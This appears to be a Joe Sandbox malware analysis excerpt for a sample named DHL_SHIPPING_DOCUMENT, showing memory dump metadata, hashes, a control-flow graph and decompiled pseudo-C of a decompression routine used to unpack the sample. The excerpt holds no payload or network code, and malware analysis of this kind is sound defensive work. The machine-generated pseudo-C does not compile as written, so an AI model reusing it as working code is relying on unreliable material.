                                                              0x00000000
                                                              0x004070cf
                                                              0x004070cf
                                                              0x004070d3
                                                              0x00407599
                                                              0x00407599
                                                              0x00000000
                                                              0x00407599
                                                              0x004070d9
                                                              0x004070d9
                                                              0x004070dc
                                                              0x004070df
                                                              0x004070e2
                                                              0x004070e4
                                                              0x004070e4
                                                              0x004070e4
                                                              0x004070e7
                                                              0x004070ea
                                                              0x004070ed
                                                              0x004070f0
                                                              0x004070f3
                                                              0x004070f6
                                                              0x004070f7
                                                              0x004070f9
                                                              0x004070f9
                                                              0x004070f9
                                                              0x004070fc
                                                              0x004070ff
                                                              0x00407102
                                                              0x00407105
                                                              0x00407105
                                                              0x00407105
                                                              0x00407108
                                                              0x0040710a
                                                              0x0040710a
                                                              0x00000000
                                                              0x00000000
                                                              0x0040734c
                                                              0x0040734c
                                                              0x0040734c
                                                              0x00407350
                                                              0x00000000
                                                              0x00000000
                                                              0x00407356
                                                              0x00407356
                                                              0x00407359
                                                              0x0040735c
                                                              0x0040735f
                                                              0x00407361
                                                              0x00407361
                                                              0x00407361
                                                              0x00407364
                                                              0x00407367
                                                              0x0040736a
                                                              0x0040736d
                                                              0x00407370
                                                              0x00407373
                                                              0x00407374
                                                              0x00407376
                                                              0x00407376
                                                              0x00407376
                                                              0x00407379
                                                              0x0040737c
                                                              0x0040737f
                                                              0x00407382
                                                              0x00407385
                                                              0x00407389
                                                              0x0040738b
                                                              0x0040738e
                                                              0x00000000
                                                              0x00407390
                                                              0x00407390
                                                              0x0040710d
                                                              0x0040710d
                                                              0x00000000
                                                              0x0040710d
                                                              0x0040738e
                                                              0x004075c3
                                                              0x004075c3
                                                              0x00000000
                                                              0x00000000
                                                              0x00406bf2
                                                              0x004075fa
                                                              0x004075fa
                                                              0x00000000
                                                              0x004075fa
                                                              0x00407447
                                                              0x004074c7
                                                              0x00407490

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                              • Instruction ID: 10cc2cc0f2c892254e5285b7a8bac4c216a70fda8fb68dfa7c3680dd08f727d3
                                                              • Opcode Fuzzy Hash: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                              • Instruction Fuzzy Hash: 55A15571E04228DBDF28CFA8C8547ADBBB1FF44305F10842AD856BB281D778A986DF45
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00407395 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 749 407395-407399 750 4073bb-4073c8 749->750 751 40739b-40749d 749->751 753 4073cb-4073e0 750->753 761 4074c7-4074cb 751->761 754 4073e2-4073f8 753->754 755 4073fa-407410 753->755 757 407413-40741a 754->757 755->757 759 407441 757->759 760 40741c-407420 757->760 766 407447-40744d 759->766 764 407426-40743e 760->764 765 4075cf-4075d9 760->765 762 40752b-40753e 761->762 763 4074cd-4074ee 761->763 762->766 767 4074f0-407505 763->767 768 407507-40751a 763->768 764->759 769 4075e5-4075f8 765->769 771 406bf2 766->771 772 4075fa 766->772 773 40751d-407524 767->773 768->773 774 4075fd-407601 769->774 775 406bf9-406bfd 771->775 776 406d39-406d5a 771->776 777 406c9e-406ca2 771->777 778 406d0e-406d12 771->778 772->774 779 4074c4 773->779 780 407526 773->780 775->769 781 406c03-406c10 775->781 776->753 785 406ca8-406cc1 777->785 786 40754e-407558 777->786 782 406d18-406d2c 778->782 783 40755d-407567 778->783 779->761 787 4074a9-4074c1 780->787 788 4075db 780->788 781->772 789 406c16-406c5c 781->789 790 406d2f-406d37 782->790 783->769 791 406cc4-406cc8 785->791 786->769 787->779 788->769 792 406c84-406c86 789->792 793 406c5e-406c62 789->793 790->776 790->778 791->777 794 406cca-406cd0 791->794 799 406c94-406c9c 792->799 800 406c88-406c92 792->800 797 406c64-406c67 GlobalFree 793->797 798 406c6d-406c7b GlobalAlloc 793->798 795 406cd2-406cd9 794->795 796 406cfa-406d0c 794->796 801 406ce4-406cf4 GlobalAlloc 795->801 802 406cdb-406cde GlobalFree 795->802 796->790 797->798 798->772 803 406c81 798->803 799->791 800->799 800->800 801->772 801->796 802->801 803->792
                                                              C-Code - Quality: 98%
                                                              			E00407395() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
